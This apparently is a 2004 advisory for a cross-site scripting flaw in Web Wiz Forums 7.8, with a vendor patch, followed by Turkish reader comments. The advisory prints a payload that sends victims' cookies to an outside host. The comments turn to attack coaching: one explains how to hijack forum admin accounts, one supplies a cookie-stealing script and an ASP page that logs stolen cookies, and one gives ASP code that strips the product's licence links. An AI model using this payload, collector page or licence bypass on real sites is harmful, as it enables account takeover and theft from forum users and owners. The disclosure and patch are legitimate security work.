Web Wiz Forums Registration Rules XSS Vulnerability

15.06.2004

Okuyucu : 27.164
Günlük Okuyucu : 19

------------------------------------------------------
WEB WIZ FORUMS REGISTRATION RULES XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?528

XSS / Cross Site Scripting attack allows an attacker to hijack other users/administrators account.


------------------------------------------------------
ABOUT WEB WIZ FORUMS;
------------------------------------------------------
Web Wiz Forums, the free award winning ASP bulletin board system software, can add value to almost any web site.

Whether you are building a small interactive community with 10 people or over 100,000 strong customer support forum, this fast, scalable, bulletin board engine can manage your community


URL & Demo & Source Code Download ;
http://www.webwizguide.info/web_wiz_forums/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.8 [possibly lower versions]


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.9


------------------------------------------------------
PROBLEM;
------------------------------------------------------
- Page
registration_rules.asp (Parameter : FID)

- Test;
registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%27%29%3C%2Fscript%3E

- Possible Exploit Pattern;
- This sample sends cookie to victim URL [in sample http://ferruh.mavituna.com/xss/]
registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javascript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2Ecom%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E


------------------------------------------------------
HOW TO PATCH [provided by vendor];
------------------------------------------------------
Download http://www.zap2.me.uk/7.7a_and_7.8_to_7.9_patch_files.zip
Version 7.9 has been released to deal with this issue.
Change line 65 of the file registration_rules.asp that reads:-

intForumID = Request.QueryString("FID")

To the following:-

If isNumeric(Request.QueryString("FID")) Then
         intForumID = CInt(Request.QueryString("FID"))
Else
         intForumID = 0
End If




-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 14.06.2004
Vendor Informed : 15.06.2004
Published : 15.06.2004


------------------------------------------------------
Vendor Status;
------------------------------------------------------
Quickly answered & fixed.


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

PGPKey : http://ferruh.mavituna.com/PGPKey.asc

Yorumlar

Bu makalenin yorumlarını RSS ile takip et!

Teşekkürler

Selim Topaloğlu [ # | 17.06.2004 ]

registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javascript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2Ecom%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E

Bu örneği lutfen acarmısınız? Mesala admin hesabını almak istiyoruz veya daha baska bie fonksiyon yapmak istiyoruz..

Şimdiden tesekkurler

sk [ # | 05.07.2004 ]

Bunuda cozdum galiba :)

http://www.adres.net/forumlar/register.asp?FID="><img%20width=0%20height=0%20s%20rc="javascript:document.images[0].src='http://ferruh.mavituna.com/xss/?'+document.cookie">

ama bu ' http://ferruh.mavituna.com/xss kısım ne olucak anlamadım hedef sitemi olucak ??????? bize biraz anLat be ferruh bey

ErKan Cengiz [ # | 14.07.2004 ]

Aslında yazcak o kadar çok şey varki maalesef henüz yetişemiyoruz. Ancak bu konularda detaylı makaleler yazmak aklımda.

Burada her şeyden öte XSS (Cross Site Scripting) açıklarını bilmek zorundasınız, ondan öncesinde de Session nedir, Cookie nedir gibi şeyleri de iyi derecede kavramış olmalısınız.

Dolayısıyla bu açığı burada alıp detaylı anlatamıyorum maalesef ancak basitçe söyleyeyim;
[victim] yerine kurban denilen yani açık bulunan site konulacak. http://ferruh.mavituna.com/xss ise sizin daha önceden hazırladığınız ve gelen tüm dataları kaydeden loglama mekanizmanızın olması gerekiyor.

Victimin bulundupu adresi bir şekilde iframe/frame vs. içerisinde yada direk mail ile tıklatma yolu ile forumda hesabını almak istediğiniz kişiye ulaştımanız gerekiyor. Ondan sonra bu kişinin forum bilgileri daha önceden hazırlamış olduğunuz loglama alanına düşecek. Ondan sonra bu bilgiler ile siteye giriş yapabilirsiniz. Tabii ki bu da o kadar basit değil. Cookie injection veya benzer şekilde cookiedeki şifreyi çözmek ile mümkün ancak.

Ferruh Mavituna [ # | 14.07.2004 ]

Tamam Olayı cozdum bir nevi Fake mail olayı fakat xss sayfasını nasıl hazırlayacagız ve xss acıkları hakkında biraz daha bilgi Lutfen

Erkan cengiz [ # | 14.07.2004 ]

Patch'i indirdim ancak hala forumuma kuraldışı giriş yapılıyor .. Nasıl engelleyeceğiz bunları ?

MalcolmX [ # | 09.08.2004 ]

Web wiz forum 7.9 daki reklamları bedava kaldırabilirsiniz. Söyleyeceklerimi dikkatle dinleyin. Aşağıda verdiğim kodu helgin.asp adıyla kaydedip forumun içindeki admin klasorune kopyalayın daha sonra foruma admin olarak giriş yapın ve sitenizinadresi/forum/admin/helgin.asp yi çağırın artık reklam meklam kalmadı vatana millete hayırlı olsun . Tahrip.com forumunu hala reklamlı kullanıyor bu bir hack sitesi için büyük bir ayıp sizde hemen uygulayın..

helgin.asp basliyor.



<%

Response.Buffer = True
Dim blnLinksRemoved, blnWrongCode, strEnteredSerial, strFID, blnFieldsXX, strLiName, strLiEM, strLiType, strXCode, blnLCode, strLiURL, saryLiEnteredSerial, strLiEncodedCode, strLiS1, strLiS2
blnLinksRemoved = false
blnWrongCode = false
blnFieldsXX = false
strCode = "BFE33F5B3BEC351BF32F9FE55DC2F8EFF33C297D"
strCode2 = "73ADD37AB4EF0672557E1AD37886325159BA4E0C"
strFID = decodeString(strCodeField)
strCode = decodeString(strCode)
strSQL = "EXECUTE " & strDbProc & "SelectConfiguration"
strSQL = "SELECT " & strDbTable & "Configuration.* From " & strDbTable & "Configuration;"
With rsCommon
.Open strSQL, adoCon, 2, 3
blnLCode = CBool(.Fields("L_code"))
strLiName = Request.Form("liname")
strLiEM = Request.Form("email")
strLiType = Request.Form("cType")
strLiURL = Request.Form("URL")
strXCode= UCase(Trim(Replace(Request.Form("code"), "'", "", 1, -1, 1)))
strLiS1 = Left(strXCode, 2)
strLiS2 = Right(strXCode, 5)
strEnteredSerial = Mid(strXCode, 4, 40)
strLiEncodedCode = HashEncode(strLiS2 & LCase(strLiURL) & strLiS1)
strEnteredSerial = HashEncode((LCase(strXCode) & strSalt))
.Fields(strFID) = False
.Update
blnLinksRemoved = True
Application("blnConfigurationSet") = false
On Error Resume Next
Call codeChecker(strLiName, strLiEM, strLiType, strLiURL, strXCode, strVersion)
blnWrongCode = True
rsCommon.Close
Set rsCommon = Nothing
Set adoCon = Nothing
Set adoCon = Nothing
End With
If blnLinksRemoved = True Then
Response.write "<center>Web Wiz Forum 7.9 başarılı bir şekilde hacklenmiştir. Vatana millete hayırlı olsun." & chr(10)
Response.write "
I Love Tahribat.com</center>"
End If

%>

helgin.asp bitti

web wiz de bu tip şeyler çok..

Helgin Helginov [ # | 17.10.2004 ]

var i:integer; HavaAtanArtist:string; begin HavaAtanArtist:='Helgin Helginov';
Tahrip.com icin ayip olan bir durum yok senin bakis açinla bizim bakis açimiz farkli...
Web Wiz dünya üzerinde asp olarak en iyi bilinen forum ve bukadar emek verilmis bir forumu harap etmek pekte yakisir alir bir durum degil...
Bir programi crack leye biliriz bu sadece serial istedigi içindir ancak web wiz bizden seri al istemiyor ve herhangi bir sekildede illa register edin demiyor dimi !!! soruyorum sana neden crack leyelim gözteris içinmi ?<br />yoksa aha bak ben yapabiliyorum içinmi ?
ASP bilen her developer o banneri çok ama çok rahatlikla kaldira bilir...
Not:Biraz kskanman için 13 yasindaki yenim ASP yaziyor kendine iyi bak ---->
for i:=1 to 1000 do<br /> begin<br /> ShowMessage(HavaAtanArtist);<br /> end;<br />end;
{yada asp ile ayin artistine mesaj verelim ;) }
<%<br />for i = 0 to 100<br />Response.Write "Helgin Helginov"<br />next<br />%>
C-Sharp yada open gl de istermisin ?

Turan CAN [ # | 22.10.2004 ]

merhaba
aspindir.com dan nuri cengiz beyin düzenlediği 7.9 siteme kurdum bir hafta sonra bir arkadaş foruma admin olarak girdi
bu hangi açıktır
hata nerde
orjinal siteden indiirmemedemi
yoksa

engn yılmaz [ # | 02.04.2005 ]

Bu açıkla forumuma denemediğim kalmadı. bir türlü giremedim.
baska forumada denedim. onada giremedim
ya bir yerde hata yaptım . yada açık kapatıldı...

Zaten su an itibariyle web wiz 7.91 çıktı ve function_filters.aspnin guncellenmesi ile xss açığının kapatıldğı söyleniyor
borg efendide aynını söylüyor ya.
genede suna inanırım girilmeyecek site girilmeyecek forum yoktur. yeterki kötü niyet olsundiyorum ve son sözüm keşke kimse kötü niyetli olmasa..

Tuna [ # | 07.06.2005 ]

Bir sey soracaktım
aynı konu hakkında..

function_filters.asp de sanırım şundan bahsetmiş.
eğer ki bu kod sayfada birden fazla ise diğerini html olrak gösterme

diyecegim şu
<link rel="stylesheet" href="includes/stile.css" type="text/css" />
gibi bisey diyelim
buradaki link koduda function_filters.asp ye dahil edilmiş..

bu sayfadaki link kodunu yukarda yazdıgım seyi bazalarak function_filters.asp sayfasında iptal etsek guvenlik sorunu teşkil eder mi?
( <link rel="stylesheet" href="includes/stile.css" type="text/css" /> sayfanın birinde iki tane ve birini html olarak algılamıyor ve direkt yazı olarak çıkıyordu..bende gözü bozmasın diye function_filters.aspde link kodunu iptal ettim. olay bu )
umarım anlatabilmişimdir :)
saygılar

Tuna [ # | 07.06.2005 ]

Arkadaşım biraz ayrıntılı anlatayım ben XSS basittir ama yinede Ferruh Beyin dediğin gibi Cookie konusunu iyi kavramanız lazım.Her neyse arkadaş bir yolla Link tıklattık dedi eğer asp biliyorsan kişinin cookie bilgilerini alabilirsin...

<script> document.location =' http://sitemiz.com/XSS.ASP?XSS='+ document.cookie </script>

dediğimizde bizim sitemize cookieler yollanacaktır.Sonrası kolay cookie klasörüne cookieyi atın işte bu kadar.Takıldığınız bir şey olursa yine sorabilirsiniz...

Durun size bir kayıt sayfası hazırlayayım :) Bi veritabanı yaratın access ile sonra xss diye bi sütun atın değeri not olsun...
Örneğin ;

<%
xss = Request.QueryString ("xss")

BITIRIM = "Provider=Microsoft.Jet.OLEDB.4.0 ; Data Source = " & Server.Mappath("db.mdb") & ";"
Set Conn = Server.CreateObject ("ADODB.Connection")
Conn.Open BITIRIM

Set Rs = Server.CreateObject ("ADODB.Recordset")
strSQL = "SELECT * From tblXSS"
Rs.Open strSQL, BITIRIM, 1,3

Rs.AddNew

Rs("xss")= xss

Rs.Update
Rs.Close
%>

İşte bu kadar bunu XSS.Asp olarak kaydedin...Hosta atın...

Kolay Gelsin

BITIRIM HACKER [SFC] [ # | 16.09.2005 ]

A great piece of work. Please keep it up! I have loved your site. http://superavto.info <a href=" http://superavto.info">auto insurance</a>

Rekojo [ # | 07.05.2006 ]

Turan amca sana Yürekden katılıyorum buyuyunce senin gipi olucam ben kahraman :)asp(: yaw abi öleceksin hala asp dion :P saısal vursun zayıflama merkezi açıcam sana

herooOOoooOOOooo [ # | 28.12.2006 ]

Arkadaslar,

ben yeni bir uyeyim burada. Insallah beni araniza kabul edersiniz. Icinizde bana tavsiye edebileceginiz bir forum barindirma url verebilecek varmi? En onemlisi turkce desteginin olmasi tabiiki, cunku ingilizcem yok denecek kadar az. Birde uzun zaman piyasada olsunki gelecegi saglam olsun. Ingilizce hosting veren birkac yerden denedim ama yarisi beni anlamiyor, digerlerinide ben anlamiyorum, ayrica birkac taneside kisa bir sure sonra piyasadan cekildiler.

Bana onerebileceginiz hangi adresler var? Birkac ozelliginide sayarmisiniz ltf?

Iyi sohbetler
Ayln

aylinistanbl [ # | 21.05.2007 ]

Yorum Ekle